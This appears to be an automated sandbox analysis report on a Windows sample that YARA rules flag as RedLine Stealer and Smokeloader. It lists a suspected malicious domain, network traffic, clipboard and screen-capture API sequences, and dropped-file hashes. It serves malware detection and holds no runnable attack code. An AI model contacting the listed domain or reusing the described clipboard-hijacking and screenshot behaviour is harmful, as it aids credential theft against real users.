Source: C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/
Source: C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/?
Source: C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/C
Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49735 version: TLS 1.2

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

0_2_004016DF

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_004016DF
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_02481942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_02481942

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

0_2_004016DF

Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe

Code function: 1_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

1_2_00431839

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.2221850742.0000000000AFA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.4215370096.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_02482361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,		0_2_02482361
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_02482605 NtdllDefWindowProc_W,PostQuitMessage,		0_2_02482605

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_00428022	0_2_00428022
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_004071AB	0_2_004071AB
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_004373D9	0_2_004373D9
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_0042D4EE	0_2_0042D4EE
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_00427484	0_2_00427484
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_00428560	0_2_00428560
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_004166AF	0_2_004166AF
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_00413725	0_2_00413725
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_004277F6	0_2_004277F6
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_0040E974	0_2_0040E974
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_0042EAE0	0_2_0042EAE0
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_00427AA0	0_2_00427AA0
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_00418AAF	0_2_00418AAF
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_00436CBF	0_2_00436CBF
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_00427D67	0_2_00427D67
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_00413F0B	0_2_00413F0B
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024A8289	0_2_024A8289
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024AED47	0_2_024AED47
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_02494172	0_2_02494172
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024A76EB	0_2_024A76EB
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024AD755	0_2_024AD755
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024A87C7	0_2_024A87C7
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024A7A5D	0_2_024A7A5D
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_0248EBDB	0_2_0248EBDB
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_02496916	0_2_02496916
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_0249398C	0_2_0249398C
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024B6F26	0_2_024B6F26
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024A7FCE	0_2_024A7FCE
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024AED47	0_2_024AED47
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024A7D07	0_2_024A7D07
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_02498D16	0_2_02498D16
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0040B44C	1_2_0040B44C
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00408790	1_2_00408790
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00426054	1_2_00426054
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0043B068	1_2_0043B068
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00414070	1_2_00414070
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0043C020	1_2_0043C020
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00439830	1_2_00439830
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0043D830	1_2_0043D830
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0041B0E1	1_2_0041B0E1
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0041F0E0	1_2_0041F0E0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004210E0	1_2_004210E0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00435890	1_2_00435890
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00434098	1_2_00434098
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0043D0A0	1_2_0043D0A0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004180A9	1_2_004180A9
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0040A940	1_2_0040A940
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0041714B	1_2_0041714B
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0040C917	1_2_0040C917
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0042B12C	1_2_0042B12C
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0042F130	1_2_0042F130
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0042B1C0	1_2_0042B1C0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0041D9E0	1_2_0041D9E0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004361E0	1_2_004361E0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004111E5	1_2_004111E5
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004059F0	1_2_004059F0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004239F2	1_2_004239F2
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0043C1F0	1_2_0043C1F0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0040F9FD	1_2_0040F9FD
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00425990	1_2_00425990
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0043B9A1	1_2_0043B9A1
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00406250	1_2_00406250
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0041D270	1_2_0041D270
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00424A74	1_2_00424A74
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00409230	1_2_00409230
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00423A34	1_2_00423A34
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004192DA	1_2_004192DA
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0043D2F0	1_2_0043D2F0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0043C280	1_2_0043C280
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00415298	1_2_00415298
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004082AE	1_2_004082AE
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004252BA	1_2_004252BA
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0041CB05	1_2_0041CB05
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00428BC0	1_2_00428BC0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004143C2	1_2_004143C2
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00402BD0	1_2_00402BD0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00428BE9	1_2_00428BE9
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00437399	1_2_00437399
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004393A0	1_2_004393A0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00416BA5	1_2_00416BA5
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004293AA	1_2_004293AA
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004223B8	1_2_004223B8
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00436C00	1_2_00436C00
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00423410	1_2_00423410
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0042B4FC	1_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004074B0	1_2_004074B0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0041DD50	1_2_0041DD50
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00418578	1_2_00418578
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0042D57E	1_2_0042D57E
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00424502	1_2_00424502
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00421D10	1_2_00421D10
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0040DD25	1_2_0040DD25
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0041D5E0	1_2_0041D5E0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00417582	1_2_00417582
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0043D580	1_2_0043D580
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00427DA2	1_2_00427DA2
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004205B0	1_2_004205B0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0042C64A	1_2_0042C64A
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00426E50	1_2_00426E50
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0042B4F7	1_2_0042B4F7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0043462A	1_2_0043462A
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00435630	1_2_00435630
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004066E0	1_2_004066E0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0042C6E4	1_2_0042C6E4
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00430EF0	1_2_00430EF0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004256F9	1_2_004256F9
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00422E93	1_2_00422E93
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00425E90	1_2_00425E90
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_004156A0	1_2_004156A0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0041BEA0	1_2_0041BEA0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00438EA0	1_2_00438EA0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00435EA0	1_2_00435EA0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0041C6BB	1_2_0041C6BB
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00415F66	1_2_00415F66
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00419770	1_2_00419770
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00409700	1_2_00409700
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0042C726	1_2_0042C726
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0042C735	1_2_0042C735
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_0041DF80	1_2_0041DF80
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00402FA0	1_2_00402FA0
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009FC0E8	1_2_009FC0E8
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A18009	1_2_00A18009
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A0C1AC	1_2_00A0C1AC
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A0E1E7	1_2_00A0E1E7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A29107	1_2_00A29107
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A26107	1_2_00A26107
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A18108	1_2_00A18108
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A21157	1_2_00A21157
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A242FF	1_2_00A242FF
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A2B2CF	1_2_00A2B2CF
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009F3207	1_2_009F3207
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A073B2	1_2_00A073B2
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A1B393	1_2_00A1B393
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A1F397	1_2_00A1F397
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009F83C7	1_2_009F83C7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A2D307	1_2_00A2D307
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A11347	1_2_00A11347
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A0F347	1_2_00A0F347
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A0B348	1_2_00A0B348
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A0734A	1_2_00A0734A
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009F9497	1_2_009F9497
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009F64B7	1_2_009F64B7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A0D4D7	1_2_00A0D4D7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A1B427	1_2_00A1B427
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A26447	1_2_00A26447
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A0144C	1_2_00A0144C
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009F45D7	1_2_009F45D7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A0C528	1_2_00A0C528
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A09541	1_2_00A09541
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A2D557	1_2_00A2D557
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A29607	1_2_00A29607
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A19611	1_2_00A19611
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A1D7E5	1_2_00A1D7E5
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A2D7E7	1_2_00A2D7E7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A087DF	1_2_00A087DF
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009F7717	1_2_009F7717
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A1B763	1_2_00A1B763
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A1C8B1	1_2_00A1C8B1
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A24891	1_2_00A24891
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A25897	1_2_00A25897
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A10817	1_2_00A10817
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A1B75E	1_2_00A1B75E
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A0D847	1_2_00A0D847
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A1C98D	1_2_00A1C98D
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A1C99C	1_2_00A1C99C
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009F89F7	1_2_009F89F7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A099D7	1_2_00A099D7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A0C921	1_2_00A0C921
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009F6947	1_2_009F6947
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A1C94B	1_2_00A1C94B
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009F9967	1_2_009F9967
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A2DA97	1_2_00A2DA97
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A29A97	1_2_00A29A97
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A25AF7	1_2_00A25AF7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A07BA7	1_2_00A07BA7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009FABA7	1_2_009FABA7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A15BF7	1_2_00A15BF7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009FCB7E	1_2_009FCB7E
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A13C9B	1_2_00A13C9B
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A14CF4	1_2_00A14CF4
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A2BC08	1_2_00A2BC08
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009F3C27	1_2_009F3C27
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009F5C57	1_2_009F5C57
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A0DC47	1_2_00A0DC47
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009FFC64	1_2_009FFC64
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009F2E37	1_2_009F2E37
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A26E67	1_2_00A26E67
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009FDF8C	1_2_009FDF8C
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A0DFB7	1_2_00A0DFB7
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A08F35	1_2_00A08F35
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00A11F77	1_2_00A11F77

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\C455.tmp.exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928

Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: String function: 009F81D7 appears 78 times
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: String function: 00414060 appears 74 times
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: String function: 00407F70 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: String function: 00A042C7 appears 74 times
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: String function: 00410720 appears 52 times
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: String function: 02490987 appears 52 times
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: String function: 0040F903 appears 36 times
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: String function: 0040FDB2 appears 123 times
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: String function: 02490019 appears 119 times

Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1684

Source: TN78WX7nJU.exe	Binary or memory string: OriginalFileName vs TN78WX7nJU.exe
Source: TN78WX7nJU.exe, 00000000.00000003.1790276412.00000000024F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs TN78WX7nJU.exe
Source: TN78WX7nJU.exe, 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs TN78WX7nJU.exe
Source: TN78WX7nJU.exe, 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs TN78WX7nJU.exe

Source: TN78WX7nJU.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

